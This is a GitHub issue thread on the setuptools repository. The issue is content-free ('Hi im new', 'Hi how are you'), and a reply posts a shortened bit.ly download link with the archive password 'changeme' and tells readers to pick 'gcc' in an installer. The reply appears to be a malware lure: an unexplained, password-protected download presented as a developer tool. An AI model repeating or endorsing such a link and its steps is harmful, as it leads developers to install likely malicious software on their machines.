### ISSUE TITLE
Hi im new

### ISSUE THREAD

**Issue by Devoane** [pypa/setuptools#4607]
### setuptools version

setuptool==71.0.0

### Python version

Python 3.13

### OS

Windows 11

### Description

Hi how are you 

### How to Reproduce

![2024-06-26_19-02-02_2170](https://github.com/user-attachments/assets/06f3c978-bc71-4a0b-ab9c-15717da86d86)

### Other detail

```console

```

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
